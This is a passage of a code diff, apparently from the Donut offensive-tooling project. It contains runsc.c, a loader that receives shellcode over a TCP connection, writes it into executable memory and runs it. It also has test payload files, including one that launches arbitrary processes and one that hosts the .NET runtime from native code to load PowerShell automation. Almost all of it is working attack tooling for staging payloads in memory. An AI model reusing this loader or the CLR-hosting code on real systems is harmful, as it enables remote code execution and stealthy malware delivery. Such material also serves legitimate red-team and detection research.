79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279 // execute
280 ((void(*)())bin)();
281 printf("OK!\n");
282 if (p->sim) {
283 #ifndef WIN
284 // close all descriptors
285 for (i=0; i<p->sim && p->sim<2048; i++) {
286 close(fd[i]);
287 }
288 #else
289 // todo
290 #endif
291 }
292 #ifdef WIN
293 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
294 #else
295 munmap (bin, p->code_len);
296 #endif
297 }
298 }
299
300 void send_data(args_t *p, int s) {
301 FILE *fd;
302 int outlen, len, opt;
303 uint32_t sum;
304 uint8_t buf[BUFSIZ];
305
306 // open file for read in binary mode
307 printf ("[ opening %s for read\n", p->file);
308 fd = fopen(p->file, "rb");
309
310 if (fd != NULL)
311 {
312 // send contents of file
313 printf ("[ sending data\n");
314 for (;;) {
315 // read block
316 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
317 // zero or less indicates EOF
318 if (outlen <= 0) break;
319 // send contents
320 for (sum=0; sum<outlen; sum += len) {
321 len=send (s, &buf[sum], outlen - sum, 0);
322 if (len <= 0) break;
323 }
324 p->code_len += sum;
325 if (outlen != sum) break;
326 }
327 printf ("[ sent %i bytes\n", p->code_len);
328 fclose(fd);
329 }
330 }
331
332 void recv_data(args_t *p, int s) {
333 int opt, r;
334 fd_set fds;
335 struct timeval tv;
336 void *pv;
337
338 p->code_len = 0;
339 p->code = malloc(BUFSIZ);
340
341 // set to non-blocking mode
342 #ifdef WIN
343 opt=1;
344 ioctlsocket (s, FIONBIO, (u_long*)&opt);
345 #else
346 opt=fcntl(s, F_GETFL, 0);
347 fcntl(s, F_SETFL, opt | O_NONBLOCK);
348 #endif
349 // keep reading until remote disconnects or we run out of memory
350 printf ("[ receiving data\n");
351
352 for (;;) {
353 FD_ZERO(&fds);
354 FD_SET(s, &fds);
355
356 tv.tv_sec = 5;
357 tv.tv_usec = 0;
358 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
359
360 if (r <= 0) {
361 printf ("[ waiting for data timed out or failed\n");
362 break;
363 }
364 // receive a block
365 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
366 if (r <= 0) break;
367 p->code_len += r;
368 // resize buffer
369 pv = realloc(p->code, p->code_len + BUFSIZ);
370 // on error, free pointer
371 if(pv == NULL) {
372 p->code_len = 0;
373 free(p->code);
374 p->code = NULL;
375 printf("[ error: out of memory.\n");
376 break;
377 }
378 p->code = pv;
379 }
380 if(p->code_len != 0) {
381 printf ("[ received %i bytes\n", p->code_len);
382 }
383 }
384
385 //
386 int ssr (args_t *p)
387 /**
388 * PURPOSE : send a shellcode or receive one from remote system and execute it
389 *
390 * RETURN : 0 or length of shellcode sent/received
391 *
392 * NOTES : None
393 *
394 *F*/
395 {
396 int s, opt, r, t;
397 fd_set fds;
398 struct timeval tv;
399
400 p->code_len=0;
401
402 // create socket
403 printf ("[ creating socket\n");
404 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
405 if (s < 0) return 0;
406
407 // ensure we can reuse socket
408 t=1;
409 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
410
411 // bind to port
412 printf ("[ binding to port %s\n", p->port);
413 r = bind(s, p->ai_addr, p->ai_addrlen);
414 if (r == 0) {
415 // listen
416 r = listen (s, 1);
417 if (r == 0) {
418 printf ("[ waiting for connections on %s\n", addr2ip(p));
419 if (r == 0) {
420 t = accept(s, p->ai_addr, &p->ai_addrlen);
421 printf ("[ accepting connection from %s\n", addr2ip(p));
422 if (t > 0) {
423 if (p->tx_mode == RSC_SEND) {
424 send_data(p, t);
425 } else {
426 recv_data(p, t);
427 xcode(p);
428 }
429 }
430 }
431 // close socket to peer
432 shutdown(t, SHUT_RDWR);
433 close(t);
434 } else {
435 perror("listen");
436 }
437 } else {
438 perror("bind");
439 }
440 // close listening socket
441 shutdown(s, SHUT_RDWR);
442 close(s);
443
444 return p->code_len;
445 }
446
447 /**F*****************************************************************/
448 int csr (args_t *p)
449 /**
450 * PURPOSE : opens connection to remote system and sends shellcode
451 *
452 * RETURN : 0 or 1
453 *
454 * NOTES : None
455 *
456 *F*/
457 {
458 int s, r, opt;
459 fd_set fds;
460 struct timeval tv;
461
462 printf ("[ creating socket\n");
463 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
464 if (s < 0) return 0;
465
466 // try connect to remote
467 printf ("[ connecting to %s\n", addr2ip(p));
468 r = connect(s, p->ai_addr, p->ai_addrlen);
469
470 if (r == 0) {
471 if (p->tx_mode==RSC_SEND) {
472 send_data(p, s);
473 } else {
474 recv_data(p, s);
475 xcode(p);
476 }
477 } else {
478 xstrerror("connect");
479 }
480 printf ("[ closing connection\n");
481 shutdown(s, SHUT_RDWR);
482 close(s);
483 return 1;
484 }
485
486 /**F*****************************************************************/
487 void xfile(args_t *p)
488 /**
489 * PURPOSE : read contents of shellcode and attempt to execute it locally
490 *
491 * RETURN : Nothing
492 *
493 * NOTES : None
494 *
495 *F*/
496 {
497 FILE *fd;
498 int len;
499 void *pv;
500
501 p->code_len = 0;
502 p->code = NULL;
503
504 printf ("[ reading code from %s\n", p->file);
505 fd = fopen(p->file, "rb");
506
507 if (fd == NULL) {
508 xstrerror("fopen(\"%s\")", p->file);
509 return;
510 }
511 // read contents of file
512 for (;;) {
513 // first loop? allocate block
514 if(p->code == NULL) {
515 p->code = malloc(BUFSIZ);
516 }
517 // read a block of data
518 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
519 if (len <= 0) break;
520 p->code_len += len;
521 // resize buffer for next read
522 pv = realloc(p->code, p->code_len + BUFSIZ);
523
524 if(pv == NULL) {
525 p->code_len = 0;
526 free(p->code);
527 p->code = NULL;
528 printf("[ error: out of memory!.\n");
529 break;
530 }
531 p->code = pv;
532 }
533 fclose(fd);
534
535 if(p->code_len != 0) {
536 xcode(p);
537 }
538 }
539
540 #ifdef WIN
541 void load_modules(char *names) {
542 HMODULE mod;
543 char *p = strtok(names, ";,");
544
545 while (p != NULL) {
546 printf ("[ loading %s...", p);
547 mod = LoadLibrary(p);
548
549 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
550
551 p = strtok(NULL, ";,");
552 }
553 }
554 #endif
555
556 /**F*****************************************************************/
557 void usage (void) {
558 printf ("\n usage: runsc <address> [options]\n");
559 printf ("\n -4 Use IP version 4 (default)");
560 printf ("\n -6 Use IP version 6");
561 printf ("\n -l Listen mode (required when listening on specific interface)");
562 #ifdef WIN
563 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
564 #endif
565 printf ("\n -f <file> Read PIC from <file>");
566 printf ("\n -s <count> Simulate real process by creating file descriptors");
567 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
568 printf ("\n -x Execute PIC (requires -f)");
569 printf ("\n\n Press any key to continue . . .");
570 getchar ();
571
572 exit (0);
573 }
574
575 /**F*****************************************************************/
576 char* getparam (int argc, char *argv[], int *i) {
577 int n=*i;
578 if (argv[n][2] != 0) {
579 return &argv[n][2];
580 }
581 if ((n+1) < argc) {
582 *i=n+1;
583 return argv[n+1];
584 }
585 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
586 exit (0);
587 }
588
589 void parse_args (args_t *p, int argc, char *argv[]) {
590 int i;
591 char opt;
592
593 // for each argument
594 for (i=1; i<argc; i++)
595 {
596 // is this option?
597 if (argv[i][0]=='-' || argv[i][1]=='/')
598 {
599 // get option value
600 opt=argv[i][1];
601 switch (opt)
602 {
603 case '4':
604 p->ai_family=AF_INET;
605 break;
606 case '6': // use ipv6 (default is ipv4)
607 p->ai_family=AF_INET6;
608 break;
609 case 'x': // execute PIC, requires -f
610 p->mode=RSC_EXEC;
611 break;
612 case 'd': // debug the code
613 p->dbg=1;
614 break;
615 case 'f': // file
616 p->file=getparam(argc, argv, &i);
617 break;
618 case 'l': // listen for incoming connections
619 p->mode=RSC_SERVER;
620 break;
621 #ifdef WIN
622 case 'm': // windows only, loads modules required by shellcode
623 p->modules = getparam(argc, argv, &i);
624 break;
625 #endif
626 case 's': // create file descriptors before execution
627 p->sim=atoi(getparam(argc, argv, &i));
628 break;
629 case 'p': // port number
630 p->port=getparam(argc, argv, &i);
631 p->port_nbr=atoi(p->port);
632 break;
633 case '?': // display usage
634 case 'h':
635 usage ();
636 break;
637 default:
638 printf ("[ unknown option %c\n", opt);
639 usage();
640 break;
641 }
642 } else {
643 // assume it's hostname or ip
644 p->address=argv[i];
645 p->mode=RSC_CLIENT;
646 }
647 }
648 }
649
650 int main (int argc, char *argv[]) {
651 args_t args;
652 struct stat st;
653
654 #ifdef WIN
655 //
656 PVOID OldValue=NULL;
657 WSADATA wsa;
658
659 //Wow64DisableWow64FsRedirection (&OldValue);
660 LoadLibrary("ws2_32");
661 LoadLibrary("advapi32");
662
663 WSAStartup(MAKEWORD(2,0), &wsa);
664 #endif
665
666 setbuf(stdout, NULL);
667 setbuf(stderr, NULL);
668
669 memset (&args, 0, sizeof(args));
670
671 // set default parameters
672 args.address = NULL;
673 args.file = NULL;
674 args.ai_family = AF_INET;
675 args.port = DEFAULT_PORT;
676 args.port_nbr = atoi(args.port);
677 args.mode = -1;
678 args.tx_mode = -1;
679 args.sim = 0;
680 args.dbg = 0;
681
682 printf ("\n[ run shellcode v0.2\n");
683
684 parse_args(&args, argc, argv);
685
686 // check if we have file parameter and it accessible
687 if (args.file!=NULL) {
688 if (stat (args.file, &st)) {
689 printf ("[ unable to access %s\n", args.file);
690 return 0;
691 }
692 }
693
694 #ifdef WIN
695 if (args.modules != NULL) {
696 load_modules(args.modules);
697 }
698 #endif
699 // if mode is executing
700 if (args.mode == RSC_EXEC) {
701 if (args.file != NULL) {
702 xfile(&args);
703 return 0;
704 } else {
705 printf ("\n[ you've used -x without supplying file with -f");
706 return 0;
707 }
708 }
709 if (init_network(&args)) {
710 // if no file specified, we receive and execute data
711 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
712
713 // if mode is -1, we listen for incoming connections
714 if (args.mode == -1) {
715 args.mode=RSC_SERVER;
716 }
717
718 // if no file specified, set to receive one
719 if (args.tx_mode == -1) {
720 args.tx_mode = RSC_RECV;
721 }
722
723 if (args.mode == RSC_SERVER) {
724 ssr (&args);
725 } else {
726 csr (&args);
727 }
728 }
729 if(args.code_len != 0) {
730 free(args.code);
731 }
732 return 0;
733 }
+0
-37
payload/test/api_test.c less more
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
+0
-35
payload/test/call_api_dll.c less more
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
10 WCHAR msg[4096];
11
12 _snwprintf(msg, ARRAYSIZE(msg),
13 L"param[0] : %s\r"
14 L"param[1] : %s\r"
15 L"param[2] : %s\r"
16 L"param[3] : %s\r",
17 arg0, arg1, arg2, arg3);
18
19 MessageBox(NULL, msg, L"Donut Test", MB_OK);
20 }
21
22 __declspec(dllexport)
23 BOOL APIENTRY DllMain(HMODULE hModule,
24 DWORD ul_reason_for_call,
25 LPVOID lpReserved) {
26 switch (ul_reason_for_call) {
27 case DLL_PROCESS_ATTACH:
28 case DLL_THREAD_ATTACH:
29 case DLL_THREAD_DETACH:
30 case DLL_PROCESS_DETACH:
31 break;
32 }
33 return TRUE;
34 }
+0
-56
payload/test/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+0
-16
payload/test/hello.cs less more
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9
10 // Keep the console window open in debug mode.
11 Console.WriteLine("Press any key to exit.");
12 Console.ReadKey();
13 }
14 }
15 }
+0
-440
payload/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
